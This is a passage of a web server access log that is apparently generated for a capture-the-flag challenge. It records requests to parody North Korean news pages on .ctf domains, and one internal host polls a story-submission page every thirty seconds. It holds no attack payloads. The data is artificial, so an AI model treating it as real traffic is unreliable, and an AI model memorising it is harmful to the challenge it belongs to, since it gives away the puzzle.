-0500] "GET /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 3075 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +40.161.109.28 - - [23/Jul/2020:11:22:08 -0500] "GET /en/north-kiringul-missile-program/ HTTP/1.0" 200 11829 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +138.20.38.52 - - [23/Jul/2020:11:22:09 -0500] "POST /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 8754 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +45.248.14.2 - - [23/Jul/2020:11:22:13 -0500] "GET /en/kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 11486 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +220.105.161.210 - - [23/Jul/2020:11:22:14 -0500] "GET /en/deep-pan-or-classic/ HTTP/1.1" 403 7699 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +144.171.16.200 - - [23/Jul/2020:11:22:17 -0500] "GET /en/performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 13470 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +244.20.13.96 - - [23/Jul/2020:11:22:21 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 2958 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:22:21 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +96.80.21.154 - - [23/Jul/2020:11:22:25 -0500] "GET /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.0" 200 11191 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +37.14.67.67 - - [23/Jul/2020:11:22:27 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 8660 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +77.95.23.64 - - [23/Jul/2020:11:22:29 -0500] "POST /new-books-published-in-dprk/ HTTP/1.1" 200 2659 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" +65.149.181.117 - - [23/Jul/2020:11:22:31 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 2732 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +130.196.131.230 - - [23/Jul/2020:11:22:35 -0500] "GET /new-kind-of-flowerpot-invented/ HTTP/1.0" 200 6840 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" +34.201.53.226 - - [23/Jul/2020:11:22:38 -0500] "GET /en/soy-based-dishes-popular-at-cooking-festival/ HTTP/1.0" 200 14321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +69.35.6.172 - - [23/Jul/2020:11:22:41 -0500] "GET /first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 200 8045 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +136.109.201.50 - - [23/Jul/2020:11:22:42 -0500] "POST /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 403 2547 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +47.93.100.76 - - [23/Jul/2020:11:22:44 -0500] "POST /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 12410 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +18.74.101.135 - - [23/Jul/2020:11:22:48 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 403 8665 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:22:51 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +81.245.251.134 - - [23/Jul/2020:11:22:52 -0500] "GET /en/performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 13397 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +209.84.255.178 - - [23/Jul/2020:11:22:53 -0500] "POST /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.0" 500 7170 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100 Safari/537.36" +15.174.102.43 - - [23/Jul/2020:11:22:55 -0500] "GET /en/nanotechnology-exhibition-in-dprk/ HTTP/1.1" 301 10122 "http://www.nkcna.ctf" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" +50.236.100.73 - - [23/Jul/2020:11:22:59 -0500] "GET / HTTP/1.0" 200 5613 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +81.148.217.12 - - [23/Jul/2020:11:23:00 -0500] "GET /kumdang-2-injection-manufactured/ HTTP/1.1" 200 5285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +37.89.20.252 - - [23/Jul/2020:11:23:02 -0500] "GET /en/loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 9959 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +222.132.48.155 - - [23/Jul/2020:11:23:06 -0500] "GET /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 11671 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +209.180.106.87 - - [23/Jul/2020:11:23:08 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 4009 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +9.35.72.74 - - [23/Jul/2020:11:23:10 -0500] "POST /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 500 6604 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +200.103.109.155 - - [23/Jul/2020:11:23:14 -0500] "POST /kim-jong-fun/ HTTP/1.0" 200 12933 "-" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" +79.62.138.170 - - [23/Jul/2020:11:23:17 -0500] "GET /new-kind-of-flowerpot-invented/ HTTP/1.0" 200 7505 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +62.58.255.188 - - [23/Jul/2020:11:23:21 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 4999 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:23:21 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +217.124.36.9 - - [23/Jul/2020:11:23:23 -0500] "GET /en/greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 301 13936 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +18.26.102.183 - - [23/Jul/2020:11:23:26 -0500] "GET /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.1" 200 13937 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +114.199.184.138 - - [23/Jul/2020:11:23:29 -0500] "POST /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 4725 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +232.79.233.240 - - [23/Jul/2020:11:23:30 -0500] "GET /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 3939 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +23.136.204.22 - - [23/Jul/2020:11:23:32 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 301 2778 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +199.229.244.203 - - [23/Jul/2020:11:23:35 -0500] "GET /99-problems/ HTTP/1.0" 404 3611 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +215.123.38.206 - - [23/Jul/2020:11:23:36 -0500] "POST /tele-education-system-upgraded/ HTTP/1.1" 200 13660 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +13.64.93.163 - - [23/Jul/2020:11:23:37 -0500] "POST /many-medical-scientific-achievements-made/ HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +86.53.234.72 - - [23/Jul/2020:11:23:39 -0500] "GET /en/ HTTP/1.1" 200 6694 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +145.203.61.125 - - [23/Jul/2020:11:23:42 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 9623 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +222.248.88.123 - - [23/Jul/2020:11:23:45 -0500] "GET / HTTP/1.0" 200 8070 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +226.142.108.184 - - [23/Jul/2020:11:23:49 -0500] "GET / HTTP/1.1" 200 12050 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:23:51 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +39.188.23.253 - - [23/Jul/2020:11:23:53 -0500] "GET /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 11411 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +99.117.35.59 - - [23/Jul/2020:11:23:57 -0500] "POST /en/dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 14747 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +166.230.243.171 - - [23/Jul/2020:11:24:00 -0500] "POST /nanotechnology-exhibition-in-dprk/ HTTP/1.0" 200 12013 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +170.163.127.143 - - [23/Jul/2020:11:24:04 -0500] "POST /ultimate-technology/ HTTP/1.1" 200 10076 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +223.232.165.123 - - [23/Jul/2020:11:24:07 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 14793 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9" +50.210.175.37 - - [23/Jul/2020:11:24:08 -0500] "GET /en/north-kiringul-air-force/ HTTP/1.1" 200 12703 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +13.156.99.58 - - [23/Jul/2020:11:24:11 -0500] "GET /en/latest-rocket/ HTTP/1.1" 200 13638 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +50.22.228.45 - - [23/Jul/2020:11:24:13 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.1" 200 13285 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +186.85.57.179 - - [23/Jul/2020:11:24:17 -0500] "GET / HTTP/1.1" 200 3777 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +239.165.7.226 - - [23/Jul/2020:11:24:21 -0500] "GET /en/kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 404 8380 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:24:21 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +61.174.96.213 - - [23/Jul/2020:11:24:22 -0500] "POST / HTTP/1.1" 200 8922 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +203.118.212.11 - - [23/Jul/2020:11:24:26 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 13106 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +149.146.131.204 - - [23/Jul/2020:11:24:27 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 6822 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +58.239.155.136 - - [23/Jul/2020:11:24:29 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 11469 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +126.87.144.93 - - [23/Jul/2020:11:24:31 -0500] "GET /en/floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 8056 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:30.0) Gecko/20100101 Firefox/30.0" +103.29.80.108 - - [23/Jul/2020:11:24:33 -0500] "POST / HTTP/1.1" 500 8507 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +118.129.92.180 - - [23/Jul/2020:11:24:34 -0500] "GET / HTTP/1.1" 200 11445 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +80.214.66.248 - - [23/Jul/2020:11:24:35 -0500] "POST /en/soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 2456 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +70.130.222.227 - - [23/Jul/2020:11:24:36 -0500] "GET /en/new-national-record-set-in-archery/ HTTP/1.1" 200 8485 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +67.224.5.25 - - [23/Jul/2020:11:24:37 -0500] "POST /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 4450 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +118.51.10.84 - - [23/Jul/2020:11:24:41 -0500] "POST /pyingpong-orphans-secondary-school-completed/ HTTP/1.0" 200 5566 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +210.52.159.171 - - [23/Jul/2020:11:24:44 -0500] "GET /loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 14014 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +7.75.154.193 - - [23/Jul/2020:11:24:47 -0500] "GET /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 8479 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +218.249.126.88 - - [23/Jul/2020:11:24:49 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 8684 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +165.140.215.90 - - [23/Jul/2020:11:24:50 -0500] "POST / HTTP/1.1" 200 5428 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +24.107.181.108 - - [23/Jul/2020:11:24:51 -0500] "GET /en/new-national-record-set-in-archery/ HTTP/1.1" 200 14161 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" +192.168.51.66 - - [23/Jul/2020:11:24:51 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +132.225.224.149 - - [23/Jul/2020:11:24:52 -0500] "POST /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 6260 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +35.53.121.134 - - [23/Jul/2020:11:24:55 -0500] "GET /ultimate-technology/ HTTP/1.1" 200 5270 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +72.44.53.151 - - [23/Jul/2020:11:24:59 -0500] "POST /sudoku/ HTTP/1.1" 200 6884 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" +44.93.228.173 - - [23/Jul/2020:11:25:01 -0500] "GET /loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 9103 "-" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +214.207.182.222 - - [23/Jul/2020:11:25:05 -0500] "GET /en/ HTTP/1.1" 200 8722 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +186.67.64.50 - - [23/Jul/2020:11:25:07 -0500] "GET /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 13061 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +119.247.79.72 - - [23/Jul/2020:11:25:08 -0500] "GET / HTTP/1.1" 200 12109 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +246.32.241.238 - - [23/Jul/2020:11:25:12 -0500] "GET /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.0" 200 5177 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +243.130.222.43 - - [23/Jul/2020:11:25:16 -0500] "GET /en/fifa-refereeing-course-held-in-dprk/ HTTP/1.0" 200 5855 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +163.233.234.240 - - [23/Jul/2020:11:25:19 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 5054 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53" +130.171.148.5 - - [23/Jul/2020:11:25:20 -0500] "GET /en/pyingpong-puppet-company/ HTTP/1.1" 304 12387 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +224.219.198.32 - - [23/Jul/2020:11:25:21 -0500] "GET / HTTP/1.0" 200 12376 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +192.168.51.66 - - [23/Jul/2020:11:25:21 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +135.206.82.13 - - [23/Jul/2020:11:25:23 -0500] "POST / HTTP/1.1" 200 5300 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +251.109.23.132 - - [23/Jul/2020:11:25:24 -0500] "GET /en/ HTTP/1.1" 200 4539 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0" +253.173.33.250 - - [23/Jul/2020:11:25:28 -0500] "GET /north-kiringul-air-force/ HTTP/1.1" 304 10586 "http://www.google.ctf" "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +215.86.248.140 - - [23/Jul/2020:11:25:31 -0500] "POST /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 304 13142 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +75.3.135.42 - - [23/Jul/2020:11:25:34 -0500] "POST / HTTP/1.1" 200 3772 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +218.224.235.74 - - [23/Jul/2020:11:25:38 -0500] "POST /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 301 8869 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +46.118.43.59 - - [23/Jul/2020:11:25:39 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 3068 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +19.7.177.38 - - [23/Jul/2020:11:25:41 -0500] "GET /en/quality-waterproof-liquid-made/ HTTP/1.1" 200 13484 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +48.211.237.183 - - [23/Jul/2020:11:25:44 -0500] "GET /en/tablet-computer-popular-in-dprk/ HTTP/1.1" 200 6715 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +139.182.242.223 - - [23/Jul/2020:11:25:48 -0500] "POST /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 14329 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +6.210.29.25 - - [23/Jul/2020:11:25:49 -0500] "GET /en/soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 12466 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:25:51 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +138.185.74.157 - - [23/Jul/2020:11:25:52 -0500] "GET /latest-rocket/ HTTP/1.1" 200 5908 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +139.220.135.104 - - [23/Jul/2020:11:25:56 -0500] "POST /ultimate-technology/ HTTP/1.1" 403 5570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +90.226.26.70 - - [23/Jul/2020:11:25:59 -0500] "GET /en/soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 400 11289 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +88.206.244.212 - - [23/Jul/2020:11:26:02 -0500] "GET /en/quality-waterproof-liquid-made/ HTTP/1.1" 200 14184 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" +156.135.121.41 - - [23/Jul/2020:11:26:03 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 9935 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +116.156.239.9 - - [23/Jul/2020:11:26:06 -0500] "GET /en/2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 5876 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +226.68.174.94 - - [23/Jul/2020:11:26:07 -0500] "GET /en/pyingpong-orphans-secondary-school-completed/ 